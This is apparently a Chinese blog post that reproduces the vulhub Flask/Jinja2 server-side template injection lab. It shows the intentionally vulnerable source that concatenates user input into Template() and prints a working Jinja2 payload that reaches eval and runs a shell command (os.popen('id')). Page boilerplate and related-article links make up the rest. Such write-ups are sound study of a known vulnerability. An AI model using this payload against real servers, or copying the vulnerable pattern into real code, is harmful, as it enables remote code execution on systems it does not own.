flask ssti漏洞复现

余生有个小酒馆

已于 2024-02-02 14:39:04 修改

阅读量206

点赞数

分类专栏： vulhub漏洞复现文章标签： flask python 后端

于 2023-11-20 23:35:05 首次发布

本文链接：https://blog.csdn.net/yougexiaojiuguan/article/details/134521210

版权

vulhub漏洞复现专栏收录该内容

70 篇文章 4 订阅

订阅专栏

1.源代码

from flask import Flask, request
from jinja2 import Template

app = Flask(__name__)

@app.route("/")
def index():
    name = request.args.get('name', 'guest')

    t = Template("Hello " + name)
    return t.render()

if __name__ == "__main__":
    app.run()

可以看到上面第10行代码 t = Template("Hello " + name),Template()完全可控，那么就可以直接写入jinja2的模板语言，如下图，页面返回54289，证明存在ssti漏洞

2.漏洞复现

vulhub的POC

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

var code = "9ad873aa-0f6c-4835-856c-5bd9d066b403"

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

余生有个小酒馆

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【网络安全 | 1.5w字总结】SSTI漏洞入门

等风来

08-24

1万+

SSTI（Server-Side Template Injection）是一种服务器端模板注入漏洞，它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而，如果在构建模板时未正确处理用户输入，就可能导致SSTI漏洞的产生。sql注入的成因是：当后端脚本语言进行数据库查询时，可以构造输入语句来进行拼接，从而实现恶意sql查询。

【网络安全 | CTF】一文带你了解SSTI漏洞 + Web_python_template_injection解题详析

等风来

05-28

6631

2.命令执行注入：攻击者在应用程序中的命令执行语句中注入模板代码，从而执行任意系统命令，获取系统权限，对系统进行攻击等。3.变量渲染注入：攻击者在应用程序中的变量渲染语句中注入模板代码，从而影响页面的输出，导致代码执行或信息泄漏等问题。在 Python 3 中，当对一个未导入的模块（如 os 模块）执行 eval() 函数时，linecache 模块会发出一个警告，可利用这个警告来读取敏感信息。1.条件语句注入：攻击者在应用程序中的条件语句中注入模板代码，从而控制条件判断的分支，导致程序的逻辑错误。

1 条评论您还未登录，请先登录后发表或查看评论

vulhub学习(3) flask-ssti 漏洞复现

yukinorong的博客

06-24

2315

环境准备漏洞环境选择vulhub ，如上述配置进入flask/ssti 打开docker环境这里可以看见环境启动成功由于我的vulhub配置在虚拟机上，不能直接用127访问。打开命令行 ifconfig，找到ip 192.x docker 启动环境会另外配置端口，利用docker ps查询。发现是8000 漏洞原理利用浏览器访问可以看见页面查看源码可以看到核心语句为 t = Template("hello " + name) 此处，函数利用get获取参数进入template

Flask服务端模板(Jinja2)注入漏洞(SSTI)复现

又菜又爱倒腾的博客

10-29

1428

#Flask服务端模板(Jinja2)注入漏洞(SSTI)复现# 一、漏洞简介服务器模板注入(SSTI)是一种利用公共 Web框架的服务器端模板作为攻击媒介的攻击方式，该攻击利用了嵌入模板的用户输入方式的弱点。SSTI攻击可以利用拼接恶意用户输入导致各种漏洞。通过模板，Web应用可以把输入转换成特定的HTML文件或者email格式。二、漏洞影响影响版本使用Flask框架开发并且使用Jinja2模板引擎，最重要的是模板内容可控。满足该条件的Flask模块中几乎都存在注入漏洞。三、产生原因 from

SSTI模板注入漏洞(vulhub 复现)

weixin_74790320的博客

02-18

1655

模板引擎（这里特指用于Web开发的模板引擎）是为了使用户界面与业务数据（内容）分离而产生的，它可以生成特定格式的文档，，模板引擎会提供一套生成html代码的程序，，然后生成模板+用户数据的前端html页面，然后反馈给浏览器，呈现在用户面前。模板引擎也会提供沙，但是可以用简而言之我的理解是模板引擎的关键就是只需要用户提供数据给模板便可以生成前端html页面，模板引擎有一定的防范机制，但是可以利用一定技术去绕过破解。

学警杯SSTI复现以及SSTI一类题目核心思路

Z052308的博客

03-31

606

2.本地尝试跑python脚本与题目构造跑一样可行，只不过在找比如__subclasses__[](117),即<class'os._wrap_close'>要本地用python写一个查找函数获得数字即python中该函数位置。开发者在涉及程序网页时为了方便将HTML语言作为一个字符串写进了一个python语句中而造成，通过对某个参数传参，进行查找调用python内部的命令执行语句，获得控制权。1.不太懂python语法规则格式会存在许多错误；萌新见解，如有错误望指正，部分引用未来得及表明出处，望见谅。

Flask (Jinja2) 服务端模板注入漏洞复现

来日可期的博客

10-15

1233

在模板引擎中，开发者可以使用特定的语法将数据与模板结合生成最终的输出。然而，如果在这个过程中，直接使用用户提供的数据而没有进行适当的过滤或转义，攻击者就可以注入恶意模板代码。攻击者可以构造恶意的输入，在用户输入中包含模板标记（如 `{{}}`），以控制模板引擎的行为。模板引擎会将用户提供的数据作为代码来执行，导致恶意代码执行在服务端上下文中

SSTI漏洞模板扫描（flask、Werkzeup）

墨痕诉清风的博客

08-07

536

代码】SSTI漏洞模板扫描。

SSTI漏洞学习（下）——Flask_Jinja模板引擎的相关绕过 .pdf

09-05

《SSTI漏洞学习（下）——Flask_Jinja模板引擎的相关绕过》 SSTI，即Server-Side Template Injection，是针对服务器端模板引擎的一种安全漏洞，允许攻击者通过注入恶意代码来控制模板渲染过程，从而获取敏感信息或...

SSTI模板注入漏洞

就是我的博客

09-04

466

当前使用的一些框架，比如python的flask，php的tp，java的spring等一般都采用成熟的的MVC的模式，用户的输入先进入Controller控制器，然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断，数据库存取，最后把结果返回给View视图层，经过模板渲染展示给用户。也就是说例如：{{}}在Jinja2中作为变量包裹标识符，Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{1+1}}会被解析成2。

flask-ssti 模板注入复现

YouthBelief的博客

11-22

1172

所有文章，仅供安全研究与学习之用，后果自负! flask-ssti 模板注入复现flask-ssti 模板注入复现0x01 漏洞描述0x02 影响范围0x03 漏洞复现1 手工验证漏洞是否存在2.执行命令tplmap工具验证0x04 漏洞修复 flask-ssti 模板注入复现 0x01 漏洞描述 Flask 是一个 web 框架。也就是说 Flask 为你提供工具，库和技术来允许你构建一个 web 应用程序。这个 wdb 应用程序可以使一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站

flask ssti 模板注入

最新发布

zkaqlaoniao的博客

04-19

319

没有接触过flask框架的小伙伴看到可能会有点懵，简单分析一下，运行这个py文件就会启动web服务，默认在本机的5000端口，@app.route(‘/test’)?作用是找路由，这里是http://127.0.0.1:5000/test路径。申明：本账号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法。环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等。

SSTI漏洞详解

2301_80661529的博客

03-20

1981

SSTI(Server-Side Template Injection)就是服务器端模板注入。利用该漏洞可用于直接攻击web服务器的内部。1.Smarty：Smarty是PHP语言中广泛使用的模板引擎，它提供了强大的模板分离和逻辑控制功能。2.Twig：Twig是一个现代化的PHP模板引擎，被广泛用于Symfony框架等PHP应用程序中。3.Blade：Blade是Laravel框架的默认模板引擎，它提供了简洁的语法和强大的模板继承特性。

SSTI漏洞利用及绕过总结(绕过姿势多样)

永不落的梦想

07-15

3081

SSTI模板注入，详细的常用注入模块利用，全面的SSTI绕过总结

jinja2模板注入_Flask服务端模板(Jinja2)注入漏洞（SSTI）复现

weixin_39654751的博客

12-21

260

目录：1.漏洞概述2.影响范围3.漏洞等级4.漏洞复现(1)环境搭建(2)漏洞利用5.漏洞原理(1)分析payload(2)分析源码6.修复建议1.漏洞概述服务器模板注入(SSTI)是一种利用公共 Web框架的服务器端模板作为攻击媒介的攻击方式，该攻击利用了嵌入模板的用户输入方式的弱点。SSTI攻击可以利用拼接恶意用户输入导致各种漏洞。通过模板，Web应用可以把输入转换成特定的HTM...

VMware Workspace ONE Access SSTI 漏洞复现(CVE-2022-22954)

xiaobai_20190815的博客

05-17

1435

一、漏洞描述 VMware Workspace ONE Access 及 Identity Manager 存在一个由服务器模板注入导致的远程命令执行漏洞，未经身份验证的攻击者可以利用此漏洞进行远程任意代码执行。二、影响版本 Linux Linux Kernel * * * Vmware Identity Manager 3.3.3 * * * Vmware Identity Manager 3.3.4 * * * Vmware Identity Manager 3.3.5 * * * Vm

SSTI简单总结和例题

Aiwin的博客

07-21

3036

SSTI简单总结和例题CISCN 2019华东南]Double Secret和[护网杯 2018]easy_tornado

Flask SSTI漏洞介绍及利用

JCPS_Y的博客

10-23

2848

Flask SSTI漏洞介绍及利用

tplmap: 一键模板注入与ssti漏洞渗透测试工具

资源摘要信息: "tplmap是一款用于Web应用程序安全评估的自动化工具，它专门针对服务器端模板注入（Server-Side Template Injection，简称SSTI）漏洞进行检测和利用。模板注入是一种代码注入技术，攻击者可以通过它在...